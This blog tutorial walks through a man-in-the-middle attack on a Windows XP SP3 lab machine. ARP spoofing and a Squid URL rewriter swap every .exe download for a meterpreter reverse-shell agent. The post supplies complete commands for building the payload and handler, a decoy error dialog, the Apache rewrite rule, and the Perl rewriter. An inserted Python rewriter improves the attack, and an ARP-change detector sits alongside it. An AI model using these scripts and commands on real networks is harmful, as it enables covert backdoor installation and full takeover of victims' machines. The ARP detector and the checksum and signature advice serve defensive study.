Owning Windows (XP SP3 vs. Squid)

This screencast demonstrates hijacking applications as they are downloaded from the Internet and replacing them with a meterpreter agent. The download may be started by the target themselves (clicking a link in the browser) or by another program already on their machine, for example a self-updating application.

The attacker takes control of the traffic with a "Man In The Middle" (MITM) attack and inspects it. Any request for a file whose name ends in ".exe" is redirected to the attacker's web server, which always replies with the agent under the requested filename, creating the illusion that it is the file the target asked for.

Please note: unlike the two previous videos, where the attacker targeted programs/services that come with the Operating System, here the attacker pursues 3rd party applications, or rather the process of installing them. As a result more user interaction is needed than before, where it was either very little (visit any web page) or none: the target has to perform a certain action (either willingly or unknowingly). The chosen method of attack could be carried out in a simpler way, however this method was chosen for reasons that will become clear in future posts.

Links

Watch video on-line:

Download video: http://download.g0tmi1k.com/videos_archive/Owning_Windows-XP_SP3_Vs._Squid.mp4

Download Script (replace.pl): *Coming soon*

Scenario/Setup

This is the third video in a series of attacking Operating Systems and our target has now updated to Windows XP Service Pack 3, hoping for better security after being compromised... twice. ;)

After spending hours re-formatting, installing and restarting, the target is using a fully up-to-date Windows XP SP3 system with the latest security patches as of March 2011. They haven't used the system "much": every setting is still at its default and they haven't installed any programs such as Anti-Virus, Firewalls or any browser plug-ins (e.g. Flash or Java). ;)

This time around the attacker goes after the process of installing new, or updating existing, software.

Tools

  • Nmap – (Can be found in BackTrack 4-R2)
  • PostgreSQL – (Can be found in BackTrack 4-R2)
  • Metasploit – (Can be found in BackTrack 4-R2)
  • Apache – (Can be found in BackTrack 4-R2)
  • A Text Editor – (Kate can be found in BackTrack 4-R2)
  • Squid – (Can be found in the BackTrack repository)
  • arpspoof – (Part of the DSniff suite, which can be found in BackTrack 4-R2)

replace.pl

#!/usr/bin/perl
########################################################################
# replace.pl         --- Squid Script (Application replacement)        #
# g0tmi1k 2011-03-09                                                   #
########################################################################
# Squid url_rewrite_program helper. Squid passes one request per line on
# STDIN (the URL is the first field); any line whose URL ends in ".exe"
# gets a reply pointing at the attacker's web server with the original
# filename kept, everything else is echoed back unchanged. Output is
# unbuffered because Squid waits for exactly one reply line per request.
use strict;
use warnings;
use IO::Handle;
use File::Basename;

$| = 1;
my $ourIP = "192.168.0.33";   # attacker's Apache server
my $debug = 0;

if ($debug == 1) {
   open (DEBUG, '>>/tmp/replace_debug.log') or die "Cannot open debug log: $!";
   autoflush DEBUG 1;
}

while (<STDIN>) {
   chomp $_;
   if ($_ =~ /(.*\.exe)/i) {
      if ($debug == 1) { print DEBUG "Input: $_\n"; }
      my $url = $1;
      my $filename = basename( $url );
      my $new_url = "http://$ourIP/$filename";
      print "$new_url\n";
      if ($debug == 1) { print DEBUG "Filename: $filename\nOutput: $new_url\n"; }
   }
   else {
      print "$_\n";
   }
}
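As an added example (not g0tmi1k's script, and not part of the original post), the same url_rewrite_program logic in Python, parsing the Squid helper line instead of relying on a greedy regex: it honours the optional concurrency channel-ID, only looks at the URL field, ignores ".exe" that merely appears somewhere in the line (a path such as /dir.exe/index.html is left alone), also catches a download script that names the file in the query string (download.php?file=app.exe) so the served file keeps that name, and never touches https, since the iptables rule only intercepts port 80. The attacker IP 192.168.0.33 is the page's value. The reply format (the rewritten URL, or the original URL to leave the request alone) is the pre-3.4 Squid helper format the page's script relies on; from Squid 3.4 onwards the helper must answer "OK rewrite-url=..." or "ERR" instead.

```python
#!/usr/bin/env python3
"""Squid url_rewrite_program helper (added example, not g0tmi1k's replace.pl).

Squid hands the helper one request per line on stdin:
    [channel-ID] URL client_ip/fqdn ident method [kv-pairs]
and expects one reply line per request. In the pre-3.4 format used here the
reply is the rewritten URL, or the original URL to leave the request alone;
a channel-ID, if present, is echoed back first so replies stay matched.
"""
import sys
from posixpath import basename
from typing import Optional
from urllib.parse import parse_qsl, urlsplit

OUR_IP = "192.168.0.33"   # attacker's Apache server (value from the page)


def rewrite_url(url: str, our_ip: str = OUR_IP) -> Optional[str]:
    """Return the replacement URL if `url` fetches a .exe, else None.

    Only plain http is rewritten: the iptables REDIRECT only intercepts
    port 80, so an https download never reaches this helper anyway.
    """
    parts = urlsplit(url)
    if parts.scheme.lower() != "http":
        return None
    candidates = [basename(parts.path)]
    # Download scripts often name the file in the query string, e.g.
    # /download.php?file=app.exe; use that name so the browser saves
    # the served agent under the name the target expects.
    candidates += [basename(value) for _, value in parse_qsl(parts.query)]
    for name in candidates:
        if name.lower().endswith(".exe"):
            return f"http://{our_ip}/{name}"
    return None


def rewrite_line(line: str, our_ip: str = OUR_IP) -> str:
    """Turn one Squid helper input line into the matching reply line."""
    fields = line.split()
    if not fields:
        return ""
    channel = ""
    if fields[0].isdigit():            # concurrency channel-ID present
        channel, fields = fields[0] + " ", fields[1:]
    if not fields:
        return channel.rstrip()
    url = fields[0]
    return channel + (rewrite_url(url, our_ip) or url)


def main() -> None:
    # Flush after every reply: Squid blocks until it gets a line back.
    for line in sys.stdin:
        sys.stdout.write(rewrite_line(line) + "\n")
        sys.stdout.flush()


if __name__ == "__main__":
    main()
```

Drop it in as `url_rewrite_program /root/replace.py` in place of the perl script; the Apache .htaccess rule on the page still serves evil.exe for whatever filename ends up in the rewritten URL.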

Method

  • Start network services and obtain an IP address
  • Create resource file and agent for metasploit
  • Start and configure metasploit to listen for the backdoor
  • Configure and start apache web server
  • Download, install and configure Squid proxy
  • Perform a man in the middle attack
  • Wait for target to download a program (either willing or unknown)
  • Game Over

Commands

start-network
dhclient eth0
/etc/init.d/postgresql-8.3 start
clear

nmap 192.168.0.* -n -sn -sP
nmap 192.168.0.103 -T4 -O -v #nmap 192.168.0.103 -T4 -p- -A -v    #-T4 -p 1-65500 -O -sS -sV -v
clear
#msfconsole
#use scanner/discovery/arp_sweep
#show options
#set RHOSTS 192.168.0.1-255
#set SMAC 11:22:33:44:55:66
#set SHOST 192.168.0.1
#show options
#run

echo "client.railgun.user32.MessageBoxA(0,\"Corrupt file. Please re-download\",\"Setup\",\"MB_OK\")" > /root/replace.rb
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.33 LPORT=4444 X > /var/www/evil.exe #| msfencode -e x86/shikata_ga_nai -c 3 -t exe -o /var/www/evil.exe
export GOCOW=1     # Always cow logo ;)
msfconsole
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set ExitOnSession false
set AutoRunScript /root/replace.rb
show options
exploit -j

#kate -> New
Options +FollowSymlinks
RewriteEngine on
RewriteRule ^(.*) evil.exe
# Save: /var/www/.htaccess
#kate -> Open: /etc/apache2/sites-enabled/000-default
#Edit (Line 11): AllowOverride All
#Save
start-apache   # /etc/init.d/apache2 start

apt-cache search squid
apt-get install squid3
y
update-rc.d -f squid3 remove

Kate -> Open: replace.pl
kate -> Open: /etc/squid3/squid.conf
Add (Line: *end*): url_rewrite_program /root/replace.pl
Edit (Line 588): acl localnet src 192.168.0.0/16
Edit (Line 644): http_access allow localnet
Edit (Line 868): http_port 3128 transparent
Save
chmod 755 /root/replace.pl
/etc/init.d/squid3 restart

iptables --table nat --append PREROUTING --in-interface eth0 --proto tcp --destination-port 80 --jump REDIRECT --to-port 3128
echo 1 > /proc/sys/net/ipv4/ip_forward
#cat /proc/sys/net/ipv4/ip_forward
#Start -> run -> cmd -> arp -a
arpspoof -i eth0 -t 192.168.0.103 192.168.0.1
#Start -> run -> cmd -> arp -a
#kate -> Open: /etc/etter.conf
##Edit (Line 17): ec_uid = 0
##Edit (Line 18): ec_gid = 0
##Edit (Line 168): redir_command_on
##Edit (Line 169): redir_command_off
##Save
#cat replace.filter
#etterfilter replace.filter -o replace.ef
##Start -> run -> cmd -> arp -a
#ettercap -T -q -i eth0 -F replace.ef -M ARP /192.168.0.1/ /192.168.0.103/
##Start -> run -> cmd -> arp -a

IE -> http://www.bing.com -> Search: flash. Download & Run

sessions -l -v
Kill arpspoof

IE -> http://www.filehippo.com -> Search: notepad++. Download Older & Run

arpspoof -i eth0 -t 192.168.0.103 192.168.0.1

Notepad++ -> Help -> Check for updates

Kill arpspoof
sessions -l -v
sessions -i 2
sysinfo
getuid
getsystem
getuid

Walkthrough

The attacker once again starts off by doing a quick sweep of the network with nmap and, after identifying the target, proceeds to port scan it. This time around no ports respond, because the Windows Firewall has been enabled by default since SP2, which limits the information returned.


The attacker then creates a short meterpreter script (replace.rb; the video calls it a resource file) which, using railgun, calls a single Windows API function (MessageBoxA) to display a message box. This gives the target some feedback that the program has "run" rather than leaving them wondering what happened.

The attacker continues with metasploit by generating the agent and configuring a handler to listen for the connection back. The script is set as the AutoRunScript, so it executes automatically as soon as a session is created.


The attacker then sets up an Apache web server to deliver the agent. A "distributed configuration file" (.htaccess) is enabled and created with a rewrite rule that maps any requested URL to the metasploit agent, so the response is served under whatever filename was requested.


With a backdoor and a delivery system ready, the attacker needs a way of filtering the web traffic so that any requested URL ending in EXE (the most common application extension in a Windows environment) is redirected to the attacker's web server instead. The attacker installs the Squid3 caching proxy, which can do this through a URL rewriter written in perl (replace.pl).

Ettercap could have been used as an alternative, however its filter language is limited and the results were less reliable.


As everything is now ready, the attacker just needs to route the target's traffic via their own machine. Like before, the attacker performs an ARP man in the middle attack with the aid of arpspoof; the iptables REDIRECT rule then hands any port 80 traffic passing through the attacker's box to Squid.
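The video checks `arp -a` on the target by eye before and after arpspoof runs. As an added check (not part of the original post), the same comparison automated: parse two Windows `arp -a` snapshots and flag any IP whose MAC changed between them and any MAC that now answers for more than one IP, which is exactly what the arpspoof step leaves behind. Both snapshots are constructed sample output and the MAC addresses are made up; the IPs match the page's lab (target .103, gateway .1, attacker .33).

```python
import re
from collections import defaultdict
from typing import Dict, List

# One row of Windows `arp -a` output:  "  192.168.0.1   00-11-22-33-44-55   dynamic"
ARP_ROW = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+([0-9a-f]{2}(?:-[0-9a-f]{2}){5})\s+(dynamic|static)",
    re.IGNORECASE,
)

# Constructed sample: the target's ARP cache before arpspoof runs ...
ARP_BEFORE = """\
Interface: 192.168.0.103 --- 0x2
  Internet Address      Physical Address      Type
  192.168.0.1           00-11-22-33-44-55     dynamic
  192.168.0.33          08-00-27-aa-bb-cc     dynamic
  224.0.0.22            01-00-5e-00-00-16     static
"""
# ... and after: the gateway entry now carries the attacker's MAC.
ARP_AFTER = """\
Interface: 192.168.0.103 --- 0x2
  Internet Address      Physical Address      Type
  192.168.0.1           08-00-27-aa-bb-cc     dynamic
  192.168.0.33          08-00-27-aa-bb-cc     dynamic
  224.0.0.22            01-00-5e-00-00-16     static
"""


def parse_arp_a(text: str) -> Dict[str, str]:
    """Map IP -> MAC (lower-case) for the entry rows of `arp -a` output."""
    table: Dict[str, str] = {}
    for line in text.splitlines():
        m = ARP_ROW.match(line)
        if m:
            table[m.group(1)] = m.group(2).lower()
    return table


def is_multicast(mac: str) -> bool:
    """Group bit set in the first octet: multicast/broadcast, never a host."""
    return int(mac[:2], 16) & 1 == 1


def arp_alerts(before: Dict[str, str], after: Dict[str, str]) -> List[str]:
    """Flag MAC changes between snapshots and one MAC claiming several IPs."""
    alerts: List[str] = []
    for ip, mac in after.items():
        if ip in before and before[ip] != mac:
            alerts.append(f"{ip}: MAC changed {before[ip]} -> {mac}")
    ips_by_mac = defaultdict(list)
    for ip, mac in after.items():
        if not is_multicast(mac):          # 224.0.0.x rows are expected to share
            ips_by_mac[mac].append(ip)
    for mac, ips in sorted(ips_by_mac.items()):
        if len(ips) > 1:
            alerts.append(f"{mac} claims {len(ips)} IPs: {', '.join(sorted(ips))}")
    return alerts


def check_sample() -> List[str]:
    """Run the comparison over the constructed before/after snapshots."""
    return arp_alerts(parse_arp_a(ARP_BEFORE), parse_arp_a(ARP_AFTER))


if __name__ == "__main__":
    for alert in check_sample():
        print(alert)
```

A router that answers for several aliased addresses, or a VM host NATing its guests, will legitimately show one MAC against several IPs, so the second rule is a lead to confirm against a known-good baseline rather than proof on its own; the gateway's MAC changing mid-session is the stronger signal.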


Everything is in place and waiting for the target to request a program. This can happen either by the target requesting it themselves (visiting a site and downloading it "manually") or by an already-installed program checking for an update, finding one available, and automatically downloading & executing it.


After waiting, the attacker notices that a session has been created and can stop the man in the middle attack: the target's traffic is no longer needed, as the agent gives the attacker a direct connection to the target.


A simple bit of privilege escalation gives the attacker complete access to the target's machine.

Notes

  • The recording software did glitch in a few places - of which I re-recorded a section and edited it in.
  • The first time the target tries to download an application, they click on the notification bar at the top rather than re-clicking on the link.
  • Adobe's official Flash web site detects the browser user agent and uses a different delivery mechanism to install, which wouldn't have worked in the default browser (Internet Explorer).
  • Not every auto-update feature uses ".exe" files to update.
  • It is recommended to check the checksum (e.g. MD5 or SHA1) of downloaded programs before executing them. Note that a checksum published on the same plain-HTTP page can be rewritten by the same man in the middle; it only helps when obtained out-of-band or over HTTPS. Checking the Authenticode signature of the .exe is a stronger test (the meterpreter agent here is unsigned).
  • It is recommended to only download from the official sites, sources or mirrors. Flash was downloaded from adobe.com (filehippo redirects to it), whereas Notepad++ was hosted on filehippo.com.

Song: Free Your Soul - Command Strange & Strings Track (Apex Remix) - Bachelors of Science

Video length: 10:00

Capture length: 34:11

Blog Post: https://blog.g0tmi1k.com/2011/03/owning-windows-xp-sp3-vs-squid/